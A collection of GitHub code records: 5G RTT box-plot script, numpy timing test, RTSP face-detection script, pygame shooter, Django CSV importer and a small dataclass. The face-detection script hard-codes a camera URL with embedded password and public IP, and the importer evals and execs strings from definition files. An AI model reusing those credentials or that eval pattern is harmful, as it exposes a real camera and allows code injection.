'dual_mode'].copy(deep=True)\nbbr_5gonly_df = bbr_df[bbr_df['mode'] == '5gonly_mode'].copy(deep=True)\n\n# process 5gonly mode\nbbr_5gonly_scgr_ho_time = bbr_5gonly_df[bbr_5gonly_df['nr_ho_category'] == 'nsa_scgr']['time_since_start'].to_list()\nbbr_5gonly_scgr_ho_interval = [(x - HO_INTERVAL_START, x + HO_INTERVAL_END) for x in bbr_5gonly_scgr_ho_time]\nbbr_df['5gonly_scgr_row'] = bbr_df.apply(\n lambda x: check_if_range_lies(x['time_since_start'], bbr_5gonly_scgr_ho_interval),\n axis=1)\nbbr_5gonly_scgr_df = bbr_df[bbr_df['5gonly_scgr_row'].notna()].copy(deep=True)\n\nbbr_5gonly_scga_ho_time = bbr_5gonly_df[bbr_5gonly_df['nr_ho_category'] == 'nsa_scga']['time_since_start'].to_list()\nbbr_5gonly_scga_ho_interval = [(x - HO_INTERVAL_START, x + HO_INTERVAL_END) for x in bbr_5gonly_scga_ho_time]\nbbr_df['5gonly_scga_row'] = bbr_df.apply(\n lambda x: check_if_range_lies(x['time_since_start'], bbr_5gonly_scga_ho_interval),\n axis=1)\nbbr_5gonly_scga_df = bbr_df[bbr_df['5gonly_scga_row'].notna()].copy(deep=True)\n\nbbr_5gonly_scgm_ho_time = bbr_5gonly_df[bbr_5gonly_df['nr_ho_category'] == 'nsa_scgm']['time_since_start'].to_list()\nbbr_5gonly_scgm_ho_interval = [(x - HO_INTERVAL_START, x + HO_INTERVAL_END) for x in bbr_5gonly_scgm_ho_time]\nbbr_df['5gonly_scgm_row'] = bbr_df.apply(\n lambda x: check_if_range_lies(x['time_since_start'], bbr_5gonly_scgm_ho_interval),\n axis=1)\nbbr_5gonly_scgm_df = bbr_df[bbr_df['5gonly_scgm_row'].notna()].copy(deep=True)\n\n# process dual mode\nbbr_dual_scgr_ho_time = bbr_dual_df[bbr_dual_df['nr_ho_category'] == 
'nsa_scgr']['time_since_start'].to_list()\nbbr_dual_scgr_ho_interval = [(x - HO_INTERVAL_START, x + HO_INTERVAL_END) for x in bbr_dual_scgr_ho_time]\nbbr_df['dual_scgr_row'] = bbr_df.apply(lambda x: check_if_range_lies(x['time_since_start'], bbr_dual_scgr_ho_interval),\n axis=1)\nbbr_dual_scgr_df = bbr_df[bbr_df['dual_scgr_row'].notna()].copy(deep=True)\n\nbbr_dual_scga_ho_time = bbr_dual_df[bbr_dual_df['nr_ho_category'] == 'nsa_scga']['time_since_start'].to_list()\nbbr_dual_scga_ho_interval = [(x - HO_INTERVAL_START, x + HO_INTERVAL_END) for x in bbr_dual_scga_ho_time]\nbbr_df['dual_scga_row'] = bbr_df.apply(lambda x: check_if_range_lies(x['time_since_start'], bbr_dual_scga_ho_interval),\n axis=1)\nbbr_dual_scga_df = bbr_df[bbr_df['dual_scga_row'].notna()].copy(deep=True)\n\nbbr_dual_scgm_ho_time = bbr_dual_df[bbr_dual_df['nr_ho_category'] == 'nsa_scgm']['time_since_start'].to_list()\nbbr_dual_scgm_ho_interval = [(x - HO_INTERVAL_START, x + HO_INTERVAL_END) for x in bbr_dual_scgm_ho_time]\nbbr_df['dual_scgm_row'] = bbr_df.apply(lambda x: check_if_range_lies(x['time_since_start'], bbr_dual_scgm_ho_interval),\n axis=1)\nbbr_dual_scgm_df = bbr_df[bbr_df['dual_scgm_row'].notna()].copy(deep=True)\n\nfeature = 'SS_RTT_AVG'\nbbr_5gonly_ho_no = bbr_5gonly_df[feature].to_list()\nbbr_5gonly_scgr = bbr_5gonly_scgr_df[feature].to_list()\nbbr_5gonly_scga = bbr_5gonly_scga_df[feature].to_list()\nbbr_5gonly_scgm = bbr_5gonly_scgm_df[feature].to_list()\n\nbbr_dual_ho_no = bbr_dual_df[feature].to_list()\nbbr_dual_scgr = bbr_dual_scgr_df[feature].to_list()\nbbr_dual_scga = bbr_dual_scga_df[feature].to_list()\nbbr_dual_scgm = bbr_dual_scgm_df[feature].to_list()\n\n#### Plot graph\nif True: # use truth value to turn on and off plotting\n plot_id = 'figure7'\n plot_name = feature\n plt.close('all')\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(5, 1.75), sharey='all')\n fig.tight_layout()\n fig.subplots_adjust(wspace=0.025)\n\n pos = [0, 1, 2, 3]\n width_box = 0.3\n pad = 0.08\n no_ho_idx = 4\n scgr_idx = 6\n scga_idx = 2\n scgm_idx = 0\n\n ec_idx_list = [no_ho_idx, scgr_idx, scga_idx, scgm_idx]\n fc_list = [colorlist20[x + 1] for x in ec_idx_list]\n ec_list = [colorlist20[x] for x in ec_idx_list]\n\n bbr_dual_list = [bbr_dual_ho_no, bbr_dual_scgr, bbr_dual_scga, bbr_dual_scgm]\n bbr_dual_list = [np.array(x) for x in bbr_dual_list]\n bbr_dual_list = [remove_nan(x) for x in bbr_dual_list]\n\n for idx in range(pos.__len__()):\n box1 = ax1.boxplot([bbr_dual_list[idx]],\n positions=[pos[idx]], autorange=True, showfliers=False, zorder=4,\n widths=width_box, patch_artist=True)\n for item in ['boxes', 'fliers', 'medians', 'caps']:\n plt.setp(box1[item], color=ec_list[idx], linewidth=1.5)\n plt.setp(box1['whiskers'], color=ec_list[idx], linewidth=1.5, linestyle=':')\n plt.setp(box1[\"boxes\"], facecolor=fc_list[idx], linewidth=1.5)\n\n ax1.axhline(y=93, linewidth=2, color='darkgrey', linestyle=':', zorder=2)\n\n bbr_5gonly_list = [bbr_5gonly_ho_no, bbr_5gonly_scgr, bbr_5gonly_scga, bbr_5gonly_scgm]\n bbr_5gonly_list = [np.array(x) for x in bbr_5gonly_list]\n bbr_5gonly_list = [remove_nan(x) for x in bbr_5gonly_list]\n\n for idx in range(pos.__len__()):\n box2 = ax2.boxplot([bbr_5gonly_list[idx]],\n positions=[pos[idx]], autorange=True, showfliers=False, zorder=4,\n widths=width_box, patch_artist=True)\n for item in ['boxes', 'fliers', 'medians', 'caps']:\n plt.setp(box2[item], color=ec_list[idx], linewidth=1.5)\n plt.setp(box2['whiskers'], color=ec_list[idx], linewidth=1.5, linestyle=':')\n plt.setp(box2[\"boxes\"], 
facecolor=fc_list[idx], linewidth=1.5)\n\n # set y-labels and limits\n ax1.set_ylabel('RTT (ms)', fontsize=16)\n ax1.set_ylim([0, 320])\n ax1.set_yticks([0, 100, 200, 300])\n ax1.tick_params(axis='both', which='major', bottom=False, labelsize=13)\n ax2.tick_params(axis='both', which='major', bottom=False, left=False, labelsize=13)\n\n ax1.text(0.75, 260, r'\\textit{dual mode}', ha=\"center\", va=\"center\", fontsize=14,\n bbox=dict(facecolor='lightgray', edgecolor='lightgray', boxstyle='round,pad=.2'), zorder=8)\n ax2.text(2.275, 270, r'\\textit{5G-only mode}', ha=\"center\", va=\"center\", fontsize=14,\n bbox=dict(facecolor='lightgray', edgecolor='lightgray', boxstyle='round,pad=.1'), zorder=8)\n\n ax1.set_xticklabels([])\n ax2.set_xticklabels([])\n\n ax1.yaxis.grid(color='gainsboro', linestyle='dashed', zorder=1)\n ax2.yaxis.grid(color='gainsboro', linestyle='dashed', zorder=1)\n\n labels = ['w/o HO', 'SCGR', 'SCGA', 'SCGM']\n patches = [Patch(facecolor=fc_list[i], edgecolor=ec_list[i], label=labels[i]) for i in range(pos.__len__())]\n\n ax1.legend(handles=patches, loc='upper right',\n ncol=4, bbox_to_anchor=(2.0, 1.3), facecolor='#dddddd', columnspacing=0.4,\n handlelength=2, framealpha=.8, fontsize=13, borderpad=0.1, labelspacing=.2, handletextpad=0.5)\n\n plot_handler(plt, plot_id, plot_name, plot_dir, show_flag=SHOW_PLOT_FLAG, ignore_eps=True, pad_inches=0.07)\n\nprint('Complete./')\n","repo_name":"SIGCOMM22-5GMobility/artifact","sub_path":"scripts/plot-section4-figure7.py","file_name":"plot-section4-figure7.py","file_ext":"py","file_size_in_byte":7863,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"76"} +{"seq_id":"39933194598","text":"import timeit\n\n# >>>>>> Package Imports <<<<<<<\nimport numpy as np\n\n# >>>>>> Local Imports <<<<<<<\n\n\n####################################################\n# CODE\n####################################################\n\ndef generate_random_non_zero_matrix(size = [10,10]):\n \"\"\"\n \"\"\"\n return np.random.choice( 100 , size) + 1\n\n\n\ndef divide_matrices_vector_form(matrix1, matrix2):\n \"\"\"\n generates random matrices and then div\n \"\"\"\n matrix1 = matrix1/matrix2\n\n return matrix1\n\n\ndef divide_matrices_loop(matrix1, matrix2):\n \"\"\"\n generates random matrices and then div\n \"\"\"\n for idx in range(matrix1.shape[0]):\n for jdx in range(matrix1.shape[1]):\n matrix1[idx,jdx] /= matrix2[idx,jdx]\n\n return matrix1\n\n\n####################################################\n# MAIN\n####################################################\n\nif __name__ == \"__main__\":\n mat1 = generate_random_non_zero_matrix()\n mat2 = generate_random_non_zero_matrix()\n\n print( timeit.timeit('divide_matrices_vector_form(mat1,mat2)', globals=globals(), number=10000) )\n print( timeit.timeit('divide_matrices_loop(mat1,mat2)', globals=globals(), number=10000) )\n\n# EOF\n","repo_name":"ai-nikolai/barl","sub_path":"experiments/experiments_profiling_numpy.py","file_name":"experiments_profiling_numpy.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"18988835702","text":"# USAGE\r\n# python recognize_faces_image.py --encodings encodings.pickle\r\n\r\n# import the necessary packages\r\nimport face_recognition\r\nimport argparse\r\nimport pickle\r\nimport cv2\r\nimport os\r\nimport time\r\n# construct the argument parser and parse the arguments\r\nap = argparse.ArgumentParser()\r\n#ap.add_argument(\"-e\", 
\"--encodings\", required=True,\r\n#\thelp=\"path to serialized db of facial encodings\")\r\n#ap.add_argument(\"-i\", \"--image\", required=False,\r\n# \thelp=\"path to input image\")\r\nap.add_argument(\"-d\", \"--detection-method\", type=str, default=\"cnn\",\r\n\thelp=\"face detection model to use: either `hog` or `cnn`\")\r\nargs = vars(ap.parse_args())\r\n\r\ncap2 = cv2.VideoCapture('rtsp://admin:Lock@1234@202.134.159.185:10554/streaming/Channels/401')\r\nret2, frame2 = cap2.read()\r\n\r\n# load the known faces and embeddings\r\n#print(\"[INFO] loading encodings...\")\r\n#data = pickle.loads(open(args[\"encodings\"], \"rb\").read())\r\n\r\n# load the input image and convert it from BGR to RGB\r\n# pathImg = r'C:\\Users\\laptopno202\\Desktop\\facebb\\images'\r\n\r\n# def get_latest_image(dirpath, valid_extensions=('jpg','jpeg','png')):\r\n# \"\"\"\r\n# Get the latest image file in the given directory\r\n# \"\"\"\r\n\r\n# # get filepaths of all files and dirs in the given dir\r\n# image_files = [os.path.join(dirpath, filename) for filename in os.listdir(dirpath)]\r\n# # filter out directories, no-extension, and wrong extension files\r\n# image_files = [f for f in image_files if '.' in f and \\\r\n# f.rsplit('.',1)[-1] in valid_extensions and os.path.isfile(f)]\r\n\r\n# if not image_files:\r\n# raise ValueError(\"No valid images in %s\" % dirpath)\r\n\r\n# return max(image_files, key=os.path.getmtime)\r\n\r\n# folder_last_modified_time = os.path.getmtime(pathImg)\r\n# print(\"Last modification time \", folder_last_modified_time)\r\n\r\n# local_time = time.ctime(folder_last_modified_time)\r\n# print(\"Last modification time(Local time):\", local_time)\r\n\r\n# image=get_latest_image(pathImg)\r\n# print(type(image))\r\n# print(os.path.basename(image))\r\n\r\n\r\n# image = cv2.imread(image)\r\n# rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n# print(rgb.shape)\r\n\r\n\r\n\r\n\r\n# image = cv2.imread(image)\r\n# rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n\r\n# detect the (x, y)-coordinates of the bounding boxes corresponding\r\n# to each face in the input image, then compute the facial embeddings\r\n# for each face\r\n#print(\"[INFO] recognizing faces...\")\r\n# from camerasync import *\r\n# try:\r\n# \tcap2 = VideoCaptureAsync('rtsp://admin:Lock@1234@202.134.159.185:10554/streaming/Channels/401')\r\n# \tcap2.start()\r\n# \tprint('Async')\r\n# except:\r\n# \tcap2 = cv2.VideoCapture('rtsp://admin:Lock@1234@202.134.159.185:10554/streaming/Channels/401')\r\n# \tprint('continuous')\r\ndef feed(cap,feedname):\r\n\tret, frame = cap.read()\r\n\tprint(ret)\r\n\r\n\tboxes = face_recognition.face_locations(frame,\r\n\t\tmodel=args[\"detection_method\"])\r\n#encodings = face_recognition.face_encodings(rgb, boxes)\r\n\r\n# initialize the list of names for each face detected\r\n#names = []\r\n\r\n# loop over the facial embeddings\r\n#for encoding in encodings:\r\n\t# attempt to match each face in the input image to our known\r\n\t# encodings\r\n\t# matches = face_recognition.compare_faces(data[\"encodings\"],\r\n\t# \tencoding)\r\n\t# name = \"Unknown\"\r\n\t#\r\n\t# # check to see if we have found a match\r\n\t# if True in matches:\r\n\t# \t# find the indexes of all matched faces then initialize a\r\n\t# \t# dictionary to count the total number of times each face\r\n\t# \t# was matched\r\n\t# \tmatchedIdxs = [i for (i, b) in enumerate(matches) if b]\r\n\t# \tcounts = {}\r\n\t#\r\n\t# \t# loop over the matched indexes and maintain a count for\r\n\t# \t# each recognized face face\r\n\t# \tfor i in 
matchedIdxs:\r\n\t# \t\tname = data[\"names\"][i]\r\n\t# \t\tcounts[name] = counts.get(name, 0) + 1\r\n\t#\r\n\t# \t# determine the recognized face with the largest number of\r\n\t# \t# votes (note: in the event of an unlikely tie Python will\r\n\t# \t# select first entry in the dictionary)\r\n\t# \tname = max(counts, key=counts.get)\r\n\t#\r\n\t# # update the list of names\r\n\t# names.append(name)\r\n\r\n# loop over the recognized faces\r\n\tfor (top, right, bottom, left) in boxes:\r\n\t\t# draw the predicted face name on the image\r\n\t\tcv2.rectangle(frame, (left, top), (right, bottom), (0, 255, 0), 2)\r\n\t\ty = top - 15 if top - 15 > 15 else top + 15\r\n\t\t#cv2.putText(image,{top,bottom},(left, y), cv2.FONT_HERSHEY_SIMPLEX,\r\n\t\t#\t0.75, (0, 255, 0), 2)\r\n\r\n# show the output image\r\n#print(\"The persion identified in the pic\" ,name)\r\n\tcv2.imshow(\"Image\", frame)\r\n\t#print(\" The BB cordinates are \", top,right,bottom,left)\r\n\tcv2.waitKey(0)\r\n\tcap.release()\r\n\r\n\tcv2.destroyAllWindows()\r\nfeed(cap2,'ch-8')\r\n#print(\"The persion identified in the pic\" ,{names})\r\n","repo_name":"prashuu13/server2_camera","sub_path":"faces_detect.py","file_name":"faces_detect.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70705966327","text":"import pygame\nimport random\n\n#TODO: hacer que lso enemigos disparen :)\n#TODO: hacer que las bombas funcionen\n#TODO: colision de las balas enemigas con el jugador\n#TODO: qué pasa con el jugador? muere? recupera la salud?Agregar entonces modficadorpara la salud\n#TODO: juego para dos jugadores :)\n\nANCHO=640\nALTO=480\nROJO=[255,0,0]\nNEGRO=[0,0,0]\nBLANCO=[255,255,255]\nVERDE=[0,255,0]\nSALMON = (240, 30, 100)\nAZUL = (0,0, 200)\nclass Cuadro(pygame.sprite.Sprite):\n '''\n Clase cuadro\n '''\n def __init__(self, p , cl=VERDE):\n pygame.sprite.Sprite.__init__(self)\n\n #self.id = =id\n self.image = pygame.Surface([40,50])\n self.image.fill(cl)\n self.rect = self.image.get_rect()\n self.rect.x=p[0]\n self.rect.y=p[1]\n self.velx=0\n self.vely=0\n\n self.bombas = 0 \n self.vidas = 3\n self.salud = 3 # con cada bala la salud se decrementa, al final, cuando es cero, se resta 1 a la vida\n\n def update(self):\n self.rect.x += self.velx\n self.rect.y += self.vely\n\n\n\nclass Rival(pygame.sprite.Sprite):\n '''\n Clase rival\n '''\n def __init__(self, p , cl=BLANCO):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([30,40])\n self.image.fill(cl)\n self.rect = self.image.get_rect()\n self.rect.x=p[0]\n self.rect.y=p[1]\n self.velx=5\n #self.vely=3\n self.temp = 100 #temporizador\n\n def update(self):\n self.rect.x += self.velx\n #self.rect.y += self.vely\n if self.temp >0 :\n self.temp -= 1 #Inicializr de nuevo el temp y disparar no s algo que se hará dentro de la clase, si no por fuera\n\nclass Bala(pygame.sprite.Sprite):\n '''\n Clase Bala\n '''\n def __init__(self, p , cl=ROJO):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([10,20])\n self.image.fill(cl)\n self.rect = self.image.get_rect()\n self.rect.x=p[0]\n self.rect.y=p[1]\n self.vely=-7\n #self.vely=3\n\n def update(self):\n self.rect.y += self.vely\n\nclass Bomba(pygame.sprite.Sprite):\n '''\n Clase Bomba\n '''\n def __init__(self, p , cl=ROJO):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([30,30])\n self.image.fill(cl)\n self.rect = self.image.get_rect()\n self.rect.x=p[0]\n self.rect.y=p[1]\n self.vely=-5\n 
#self.vely=3\n\n def update(self):\n self.rect.y += self.vely\n\n\n\n\n#-------------------------------------------------------------------------------------------------\n\nclass Ventaja(pygame.sprite.Sprite):\n '''\n Clase ventaja - modificadores \n '''\n def __init__(self, p , cl=AZUL):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface([8,8])\n self.image.fill(cl)\n self.rect = self.image.get_rect()\n self.rect.x=p[0]\n self.rect.y=p[1]\n self.vely=-5\n #self.vely=3\n\n def update(self):\n self.rect.y += self.vely\n\n if self.rect.y >= (ANCHO - self.rect.height):\n self.rect.y = ANCHO - self.rect.height\n self.vely = 0\n\n\n\nif __name__ == '__main__':\n pygame.init()\n ptos=0\n pantalla=pygame.display.set_mode([ANCHO,ALTO])\n\n jugadores= pygame.sprite.Group()\n rivales = pygame.sprite.Group()\n balas = pygame.sprite.Group()\n balasR = pygame.sprite.Group() #balas de los rivales\n bomba = pygame.sprite.Group()\n ventajas = pygame.sprite.Group()\n\n j1=Cuadro([100,100],VERDE)\n j2=Cuadro([250,100],ROJO)\n\n jugadores.add(j1)\n jugadores.add(j2)\n\n #creacion de rivales\n n=10\n for i in range(n):\n r=Rival([20,20])\n r.rect.x = random.randrange(1,150)\n r.rect.y = random.randrange(ALTO- (r.rect.height+100))\n r.velx = random.randrange(10)\n rivales.add(r)\n\n\n\n reloj=pygame.time.Clock()\n fin=False\n endGame = False\n while not (fin or endGame):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n fin=True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RIGHT:\n j1.velx = 5\n j1.vely = 0\n if event.key == pygame.K_LEFT:\n j1.velx = -5\n j1.vely = 0\n if event.key == pygame.K_UP:\n j1.vely = -5\n j1.velx = 0\n if event.key == pygame.K_DOWN:\n j1.vely = 5\n j1.velx = 0\n if event.key == pygame.K_t:\n #crear balas\n b=Bala([j2.rect.x , j2.rect.y])\n balas.add(b)\n if event.key == pygame.K_p:\n #crear balas\n b=Bala([j1.rect.x , j1.rect.y])\n balas.add(b)\n if event.key == pygame.K_i:\n #crear bomba\n u=Bomba([j1.rect.x , j1.rect.y])\n bomba.add(u)\n if event.key == pygame.K_d:\n j2.vely = 0\n j2.velx = 5\n if event.key == pygame.K_a:\n j2.vely = 0\n j2.velx = -5\n if event.key == pygame.K_w:\n j2.velx = 0\n j2.vely = -5\n if event.key == pygame.K_s:\n j2.velx = 0\n j2.vely = 5\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_RIGHT:\n j1.velx=0\n j1.vely=0\n if event.key == pygame.K_LEFT:\n j1.velx=0\n j1.vely=0\n if event.key == pygame.K_UP:\n j1.velx=0\n j1.vely=0\n if event.key == pygame.K_DOWN:\n j1.velx=0\n j1.vely=0\n if event.key == pygame.K_d:\n j2.velx=0\n j2.vely=0\n if event.key == pygame.K_a:\n j2.velx=0\n j2.vely=0\n if event.key == pygame.K_w:\n j2.velx=0\n j2.vely=0\n if event.key == pygame.K_s:\n j2.velx=0\n j2.vely=0\n\n\n\n #control\n jugadores.update()\n\n #Agrega las condiciones de parada\n if j1.rect.x > (ANCHO - j1.rect.width):\n j1.rect.x = ANCHO - j1.rect.width\n j1.velx=0\n if j2.rect.x > (ANCHO - j2.rect.width):\n j2.rect.x = ANCHO - j2.rect.width\n j2.velx=0\n if j1.rect.x < (0):\n j1.rect.x = 0\n j1.velx=0\n if j2.rect.x < (0):\n j2.rect.x = 0\n j2.velx=0\n if j1.rect.y > (ALTO - j1.rect.height):\n j1.rect.y = ALTO - j1.rect.height\n j1.vely=0\n if j2.rect.y > (ALTO - j2.rect.height):\n j2.rect.y = ALTO - j2.rect.height\n j2.vely=0\n if j1.rect.y < (0):\n j1.rect.y = 0\n j1.vely=0\n if j2.rect.y < (0):\n j2.rect.y = 0\n j2.vely=0\n\n for r in rivales:\n if r.rect.x > (ANCHO - r.rect.width):\n r.velx = r.velx*-1\n if r.rect.x <= 0:\n r.velx = r.velx*-1\n\n if r.temp<= 0:\n b = Bala([r.rect.x , r.rect.y 
], SALMON)\n b.vely = 7\n balasR.add(b)\n b.temp = random.randrange(100)\n\n\n\n\n #Se usa para que el grupo \"balas\" cuando choque con rivales, los elimine\n #Si se pone False, en vez de true, no lo elimina\n #Ejemplo: cuando un jugador esta en fuego que se queme\n for b in balas:\n ls_col=pygame.sprite.spritecollide(b,rivales,True)\n for r in ls_col:\n #SI es True, cuenta cuantos cuadros a eliminado\n ptos+=1 #la ventaja aparece cuando se haya golpeado un enemigo\n\n ifVentaja = random.randrange(1000)\n if ifVentaja > 800:\n #crear ventaja\n v = Ventaja ([r.rect.x , r.rect.y ])\n ventajas.add(v)\n\n print (ptos)\n balas.remove(b)\n\n #Que sucede cuando el jugador toca una bala del rival? :\n\n for b in balasR:\n ls_col=pygame.sprite.spritecollide(b,jugadores,True)\n if j in ls_col:\n\n if j.vidas == 0:\n endGame = True\n else : # collide lo elimina de la pantalla , por eso debo hacerlo aparecer de nuevo\n if j.salud < 0:\n j.salud -= 1\n\n else : #si salud es menor a cero, se debe decrementar la cantidad de vidas que tiene el jugador\n vACtual= j.vidas -1\n j1 = Cuadro([100, 200] , VERDE)\n j1.vidas = vACtual\n jugadores.add(j1)\n \n\n\n for u in bomba:\n ls_col=pygame.sprite.spritecollide(u,rivales,True)\n for r in ls_col:\n bomba.remove(rivales)\n\n\n for j in jugadores:\n lsCap = pygame.sprite.spritecollide(j, ventajas, True)\n\n for v in lsCap:\n j.bombas += 1\n ventajas.remove(v)\n\n\n #limpieza\n for b in balas:\n if b.rect.y < -10:\n balas.remove(b)\n\n rivales.update()\n balas.update()\n bomba.update()\n ventajas.update()\n balasR.update()\n\n #refresca la pantala\n pantalla.fill(NEGRO)\n jugadores.draw(pantalla)\n rivales.draw(pantalla)\n balas.draw(pantalla)\n bomba.draw(pantalla)\n ventajas.draw(pantalla)\n pygame.display.flip()\n reloj.tick(60)\n\n\n","repo_name":"m3lissaeg/PythonPygame","sub_path":"game/gameDiego.py","file_name":"gameDiego.py","file_ext":"py","file_size_in_byte":10110,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"5209283734","text":"# defining a function\ndef get_weekend_average_teap(temps):\n add = 0\n for temp in temps.values():\n add = add + temp\n avg = format(add / len(temps), '.2f')\n return avg\n\n\ntemp_val = {\"Sunday\": 21, \"Monday\": 22, \"Tuesday\": 25, \"Wednesday\": 23,\n \"Thursday\": 20, \"Friday\": 22, \"Saturday\": 28}\n# printing the average temperature\nprint(\"The avaerage weekend temperature is\", get_weekend_average_teap(temp_val))\n","repo_name":"Mayank-B01/Python-programming","sub_path":"Week 6/Workshop/3.6.py","file_name":"3.6.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17228505011","text":"from django.contrib.contenttypes.models import ContentType\nimport datetime\n\nfrom contextlib import contextmanager\n@contextmanager\ndef fake_create_revision(*args,**kwargs):\n yield\n\ndef get_reversion_manager(disable_reversion):\n if disable_reversion:\n using_reversion = False\n create_revision = fake_create_revision\n else:\n try:\n import reversion as revisions\n using_reversion = True\n create_revision = revisions.create_revision\n except:\n using_reversion = False\n create_revision = fake_create_revision\n return using_reversion, create_revision\n\nclass DataImporter(object):\n def __init__(self, *args, **kwargs):\n self.failed = []\n self.skipped = []\n self.success = []\n\n self.file_defn = kwargs['file_defn']\n self.options = kwargs['options']\n self.stdout = 
kwargs['stdout']\n self.stderr = kwargs['stderr']\n self.debug_mode = kwargs['debug_mode']\n self.verbosity = int(self.options.get('verbosity',1))\n\n def skip_row(self, i, row, reason=\"\"):\n if self.verbosity>=2:\n self.stdout.write(\n \"Line {row} - skipped making model - {name} - {reason}\".format(\n reason=reason,\n row=i,\n name=self.import_name\n )\n )\n if self.verbosity==3:\n self.stdout.write('%s'%row)\n self.skipped.append(i)\n\n def get_model(self, requested_model=None):\n if requested_model is None:\n requested_model = self.file_defn['model']\n try:\n app_label,model = requested_model.lower().split('.',1)\n model = ContentType.objects.get(app_label=app_label,model=model).model_class()\n except ContentType.DoesNotExist:\n self.stderr.write(\"Model does not exist - %s\"%requested_model)\n return None\n return model\n\n def process_row(self, row, index):\n if self.file_defn.get('models', None):\n self.import_defns = self.file_defn['models']\n else:\n self.import_defns = [self.file_defn]\n\n for import_defn in self.import_defns:\n model = self.get_model(import_defn['model'])\n # self.stdout.write(\"importing file <%s> in as model <%s>\"%(filename,model))\n self.import_name = import_defn.get('import_name', \"\")\n self.process_row_imports(row, index, import_defn)\n\n def process_row_imports(self, row, index, import_defn):\n i = index\n model = self.get_model(import_defn['model'])\n values = {}\n try:\n if import_defn.get(\"condition\"):\n condition = import_defn[\"condition\"]['python']\n if not eval(condition):\n self.skip_row(i, row, \"condition not met\")\n return\n for f_name, f_details in import_defn['fields'].items():\n \n\n if type(f_details) not in [type({}), type([])]:\n values[f_name] = row[f_details]\n elif type(f_details) is type({}):\n if f_details['type'] == 'null_is_blank':\n val = row[f_details['field']]\n if val is None:\n val = \"\"\n values[f_name] = val\n if f_details['type'] == 'const':\n values[f_name] = f_details['value']\n if f_details['type'] == 'lookup':\n sub_model = self.get_model(f_details['model'])\n try:\n lookups = {}\n for f,v in f_details['fields'].items():\n if type(v) is str:\n lookups[f] = row[v]\n elif type(v) is dict:\n if v['type'] == \"const\":\n lookups[f] = v['value']\n elif v['type'] == \"python\":\n lookups[f] = eval(v['code'])\n values[f_name] = sub_model.objects.get(\n **lookups\n )\n except sub_model.DoesNotExist:\n if f_details.get('not_found', None) == 'null':\n values[f_name] = None\n elif f_details.get('not_found', None) == 'skip':\n self.skip_row(i, row, \"related model not found\")\n return\n else: #if f_details.get('not_found', None) != 'skip':\n raise\n\n if f_details['type'] == 'const_lookup':\n sub_model = self.get_model(f_details['model'])\n values[f_name] = sub_model.objects.get(\n **dict([\n (f,v) for f,v in f_details['fields'].items()\n ])\n )\n\n if f_details['type'] == 'python':\n script = f_details.get('code')\n get_model = lambda x: self.get_model(x)\n value = eval(script)\n values[f_name] = value\n\n if f_details['type'] == 'coded':\n mapping = f_details['choices']\n default = mapping.pop('__unknown__', None)\n values[f_name] = mapping.get(row[f_details['value']], default)\n \n if f_details['type'] == 'date':\n val = row[f_details['value']]\n try:\n values[f_name] = datetime.datetime.strptime(val,f_details['date_format']).date()\n except:\n values[f_name] = None\n\n if self.debug_mode:\n print(values)\n\n if import_defn.get('database', {}).get(\"key\"):\n # If the spec defines a lookup key to match this row 
against\n keys = import_defn.get('database', {}).get(\"key\")\n lookup_vals = {}\n if type(keys) is str:\n keys = [keys]\n for key in keys:\n lookup_vals[key] = values.pop(key)\n lookup_vals['defaults']=values\n obj,created = model.objects.update_or_create(**lookup_vals)\n else:\n obj,created = model.objects.get_or_create(**values)\n\n if import_defn.get('after_create'):\n was_created = created\n this = obj\n row = row\n get_model = lambda x: self.get_model(x)\n\n script = import_defn.get('after_create').get('python')\n if script:\n try:\n exec(script)\n except:\n pass\n\n\n if self.options.get('force_create', False):\n created = True\n if created:\n self.success.append(i)\n else:\n self.skip_row(i, row, \"already exists\")\n except Exception as e:\n if self.verbosity >=2:\n self.stderr.write(\"Line %s - %s\"%(i,e))\n if self.debug_mode:\n raise\n self.failed.append(i)\n # end transaction\n","repo_name":"LegoStormtroopr/django-data-importer","sub_path":"data_importer/importers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3845542644","text":"'''\n2520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.\nWhat is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?\n'''\n\ndef smallestMultiple(n):\n num = n\n while True:\n div = True\n for x in range(1, n+1):\n if num % x != 0:\n div = False\n if not div:\n num += 1\n else:\n return num\n\nimport math\n\ndef smallestMultiple2(n):\n result = 1\n for x in range(1, n+1):\n result *= x // math.gcd(x, result)\n return result\n\nprint(smallestMultiple2(10))\nprint(smallestMultiple2(20))\n","repo_name":"rahulpoptani/Python-Playground","sub_path":"CodingPlatform/ProjectEuler/005_SmallestMultiple.py","file_name":"005_SmallestMultiple.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5460847290","text":"from dataclasses import dataclass\n\n@dataclass\nclass User:\n name: str\n is_active: bool\n is_foreign: bool\n language : str\n\n def say_hello(self, message):\n print(message)\n\n # Decompose conditional in methods\n def validate_user(self):\n accepted_age = range(18, 25)\n\n if not self.age in accepted_age:\n raise ValueError(\"You can not be my colleague\")\n\n if not self.is_active:\n raise ValueError(\"Inactive user\")\n\n\ndef international_hello(self, user: User, language: str):\n available_languages = 